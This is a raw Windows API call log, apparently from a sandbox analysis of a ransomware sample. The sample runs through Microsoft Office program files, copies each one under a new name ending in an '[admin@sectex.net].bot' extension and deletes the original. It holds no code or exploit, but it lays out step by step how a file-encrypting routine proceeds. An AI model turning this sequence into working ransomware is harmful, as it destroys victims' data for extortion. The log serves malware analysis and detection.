	[0159.551] lstrlenW (lpString=".pdf") returned 4
	[0159.551] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.551] lstrlenW (lpString=".xls") returned 4
	[0159.551] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.551] lstrlenW (lpString=".xlsx") returned 5
	[0159.551] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0159.551] lstrlenW (lpString=".ppt") returned 4
	[0159.551] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.551] lstrlenW (lpString=".zip") returned 4
	[0159.551] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.552] lstrlenW (lpString=".rar") returned 4
	[0159.552] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.552] lstrlenW (lpString=".bz2") returned 4
	[0159.552] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.552] lstrlenW (lpString=".7z") returned 3
	[0159.552] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.552] lstrlenW (lpString=".dbf") returned 4
	[0159.552] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.552] lstrlenW (lpString=".1cd") returned 4
	[0159.552] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.552] lstrlenW (lpString=".jpg") returned 4
	[0159.552] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.552] lstrlenW (lpString=".doc") returned 4
	[0159.552] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.552] lstrlenW (lpString=".docx") returned 5
	[0159.552] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0159.552] lstrlenW (lpString=".pdf") returned 4
	[0159.552] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.552] lstrlenW (lpString=".xls") returned 4
	[0159.552] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.552] lstrlenW (lpString=".xlsx") returned 5
	[0159.552] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0159.552] lstrlenW (lpString=".ppt") returned 4
	[0159.553] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.553] lstrlenW (lpString=".zip") returned 4
	[0159.553] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.553] lstrlenW (lpString=".rar") returned 4
	[0159.553] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.553] lstrlenW (lpString=".bz2") returned 4
	[0159.553] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.553] lstrlenW (lpString=".7z") returned 3
	[0159.553] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.553] lstrlenW (lpString=".dbf") returned 4
	[0159.553] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.553] lstrlenW (lpString=".1cd") returned 4
	[0159.553] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.553] lstrlenW (lpString=".jpg") returned 4
	[0159.553] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.553] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.553] lstrlenW (lpString="EMABLT32.DLL") returned 12
	[0159.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\emablt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.554] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=154496) returned 1
	[0159.554] CloseHandle (hObject=0x25c) returned 1
	[0159.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\emablt32.dll")) returned 0x20
	[0159.554] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\emablt32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\emablt32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL") returned 55
	[0159.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL") returned 55
	[0159.554] lstrlenW (lpString=".doc") returned 4
	[0159.555] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.555] lstrlenW (lpString=".docx") returned 5
	[0159.555] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0159.555] lstrlenW (lpString=".pdf") returned 4
	[0159.555] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.555] lstrlenW (lpString=".xls") returned 4
	[0159.555] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.555] lstrlenW (lpString=".xlsx") returned 5
	[0159.555] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0159.555] lstrlenW (lpString=".ppt") returned 4
	[0159.555] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL") returned 55
	[0159.555] lstrlenW (lpString=".zip") returned 4
	[0159.555] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.555] lstrlenW (lpString=".rar") returned 4
	[0159.555] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.555] lstrlenW (lpString=".bz2") returned 4
	[0159.555] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.555] lstrlenW (lpString=".7z") returned 3
	[0159.555] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EMABLT32.DLL") returned 55
	[0159.555] lstrlenW (lpString=".dbf") returned 4
	[0159.555] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.556] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2125752) returned 1
	[0159.556] CloseHandle (hObject=0x25c) returned 1
	[0159.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMSMDB32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\emsmdb32.dll")) returned 0x20
	[0159.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMSMDB32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\emsmdb32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMSMDB32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\emsmdb32.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\EMSMDB32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\emsmdb32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0159.556] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=311852) returned 1
	[0159.556] CloseHandle (hObject=0x25c) returned 1
	[0159.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\english.lng")) returned 0x20
	[0159.557] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\english.lng.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\english.lng"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.557] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.557] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\english.lng.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.558] GetLastError () returned 0x0
	[0159.559] ReadFile (in: hFile=0x25c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x4c22c, lpOverlapped=0x0) returned 1
	[0159.566] WriteFile (in: hFile=0x3f0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x4c230, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x4c230, lpOverlapped=0x0) returned 1
	[0159.572] ReadFile (in: hFile=0x25c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.572] WriteFile (in: hFile=0x3f0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0159.572] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.573] CloseHandle (hObject=0x3f0) returned 1
	[0159.573] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.573] SetEndOfFile (hFile=0x25c) returned 1
	[0159.864] CloseHandle (hObject=0x25c) returned 1
	[0159.876] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.942] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG" (normalized: "c:\\program files\\microsoft office\\office14\\english.lng")) returned 1
	[0159.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.943] lstrlenW (lpString=".doc") returned 4
	[0159.943] lstrcmpiW (lpString1=".doc", lpString2=".LNG") returned -1
	[0159.943] lstrlenW (lpString=".docx") returned 5
	[0159.943] lstrcmpiW (lpString1=".docx", lpString2="H.LNG") returned -1
	[0159.943] lstrlenW (lpString=".pdf") returned 4
	[0159.943] lstrcmpiW (lpString1=".pdf", lpString2=".LNG") returned 1
	[0159.943] lstrlenW (lpString=".xls") returned 4
	[0159.943] lstrcmpiW (lpString1=".xls", lpString2=".LNG") returned 1
	[0159.943] lstrlenW (lpString=".xlsx") returned 5
	[0159.943] lstrcmpiW (lpString1=".xlsx", lpString2="H.LNG") returned -1
	[0159.943] lstrlenW (lpString=".ppt") returned 4
	[0159.943] lstrcmpiW (lpString1=".ppt", lpString2=".LNG") returned 1
	[0159.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.943] lstrlenW (lpString=".zip") returned 4
	[0159.943] lstrcmpiW (lpString1=".zip", lpString2=".LNG") returned 1
	[0159.943] lstrlenW (lpString=".rar") returned 4
	[0159.943] lstrcmpiW (lpString1=".rar", lpString2=".LNG") returned 1
	[0159.943] lstrlenW (lpString=".bz2") returned 4
	[0159.943] lstrcmpiW (lpString1=".bz2", lpString2=".LNG") returned -1
	[0159.943] lstrlenW (lpString=".7z") returned 3
	[0159.943] lstrcmpiW (lpString1=".7z", lpString2="LNG") returned -1
	[0159.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.943] lstrlenW (lpString=".dbf") returned 4
	[0159.943] lstrcmpiW (lpString1=".dbf", lpString2=".LNG") returned -1
	[0159.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.943] lstrlenW (lpString=".1cd") returned 4
	[0159.943] lstrcmpiW (lpString1=".1cd", lpString2=".LNG") returned -1
	[0159.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.943] lstrlenW (lpString=".jpg") returned 4
	[0159.944] lstrcmpiW (lpString1=".jpg", lpString2=".LNG") returned -1
	[0159.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.944] lstrlenW (lpString=".doc") returned 4
	[0159.944] lstrcmpiW (lpString1=".doc", lpString2=".LNG") returned -1
	[0159.944] lstrlenW (lpString=".docx") returned 5
	[0159.944] lstrcmpiW (lpString1=".docx", lpString2="H.LNG") returned -1
	[0159.944] lstrlenW (lpString=".pdf") returned 4
	[0159.944] lstrcmpiW (lpString1=".pdf", lpString2=".LNG") returned 1
	[0159.944] lstrlenW (lpString=".xls") returned 4
	[0159.944] lstrcmpiW (lpString1=".xls", lpString2=".LNG") returned 1
	[0159.944] lstrlenW (lpString=".xlsx") returned 5
	[0159.944] lstrcmpiW (lpString1=".xlsx", lpString2="H.LNG") returned -1
	[0159.944] lstrlenW (lpString=".ppt") returned 4
	[0159.944] lstrcmpiW (lpString1=".ppt", lpString2=".LNG") returned 1
	[0159.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.944] lstrlenW (lpString=".zip") returned 4
	[0159.944] lstrcmpiW (lpString1=".zip", lpString2=".LNG") returned 1
	[0159.944] lstrlenW (lpString=".rar") returned 4
	[0159.944] lstrcmpiW (lpString1=".rar", lpString2=".LNG") returned 1
	[0159.944] lstrlenW (lpString=".bz2") returned 4
	[0159.944] lstrcmpiW (lpString1=".bz2", lpString2=".LNG") returned -1
	[0159.944] lstrlenW (lpString=".7z") returned 3
	[0159.944] lstrcmpiW (lpString1=".7z", lpString2="LNG") returned -1
	[0159.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.944] lstrlenW (lpString=".dbf") returned 4
	[0159.944] lstrcmpiW (lpString1=".dbf", lpString2=".LNG") returned -1
	[0159.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.944] lstrlenW (lpString=".1cd") returned 4
	[0159.944] lstrcmpiW (lpString1=".1cd", lpString2=".LNG") returned -1
	[0159.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ENGLISH.LNG") returned 54
	[0159.945] lstrlenW (lpString=".jpg") returned 4
	[0159.945] lstrcmpiW (lpString1=".jpg", lpString2=".LNG") returned -1
	[0159.945] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0159.945] lstrlenW (lpString="ACTIVITS.ICO") returned 12
	[0159.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.953] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2998) returned 1
	[0159.953] CloseHandle (hObject=0x3d0) returned 1
	[0159.953] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico")) returned 0x20
	[0159.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.959] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.959] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.039] GetLastError () returned 0x0
	[0160.039] ReadFile (in: hFile=0x1b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0160.061] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0160.062] ReadFile (in: hFile=0x1b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.062] WriteFile (in: hFile=0x398, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.062] SetEndOfFile (hFile=0x398) returned 1
	[0160.155] CloseHandle (hObject=0x398) returned 1
	[0160.155] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.155] SetEndOfFile (hFile=0x1b4) returned 1
	[0160.161] CloseHandle (hObject=0x1b4) returned 1
	[0160.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.446] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico")) returned 1
	[0160.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.694] lstrlenW (lpString=".doc") returned 4
	[0160.694] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.694] lstrlenW (lpString=".docx") returned 5
	[0160.694] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.695] lstrlenW (lpString=".pdf") returned 4
	[0160.695] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.695] lstrlenW (lpString=".xls") returned 4
	[0160.695] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.695] lstrlenW (lpString=".xlsx") returned 5
	[0160.695] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.695] lstrlenW (lpString=".ppt") returned 4
	[0160.695] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.695] lstrlenW (lpString=".zip") returned 4
	[0160.695] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.695] lstrlenW (lpString=".rar") returned 4
	[0160.695] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.695] lstrlenW (lpString=".bz2") returned 4
	[0160.695] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.695] lstrlenW (lpString=".7z") returned 3
	[0160.695] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.695] lstrlenW (lpString=".dbf") returned 4
	[0160.695] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.695] lstrlenW (lpString=".1cd") returned 4
	[0160.695] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.695] lstrlenW (lpString=".jpg") returned 4
	[0160.695] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.695] lstrlenW (lpString=".doc") returned 4
	[0160.696] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.696] lstrlenW (lpString=".docx") returned 5
	[0160.696] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.696] lstrlenW (lpString=".pdf") returned 4
	[0160.696] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.696] lstrlenW (lpString=".xls") returned 4
	[0160.696] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.696] lstrlenW (lpString=".xlsx") returned 5
	[0160.696] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.696] lstrlenW (lpString=".ppt") returned 4
	[0160.696] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.696] lstrlenW (lpString=".zip") returned 4
	[0160.696] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.696] lstrlenW (lpString=".rar") returned 4
	[0160.696] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.696] lstrlenW (lpString=".bz2") returned 4
	[0160.696] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.696] lstrlenW (lpString=".7z") returned 3
	[0160.696] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.696] lstrlenW (lpString=".dbf") returned 4
	[0160.697] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.697] lstrlenW (lpString=".1cd") returned 4
	[0160.697] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO") returned 66
	[0160.697] lstrlenW (lpString=".jpg") returned 4
	[0160.697] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.697] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.697] lstrlenW (lpString="DISTLSTS.ICO") returned 12
	[0160.697] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0160.711] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=2998) returned 1
	[0160.711] CloseHandle (hObject=0x388) returned 1
	[0160.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico")) returned 0x20
	[0160.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlsts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.714] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
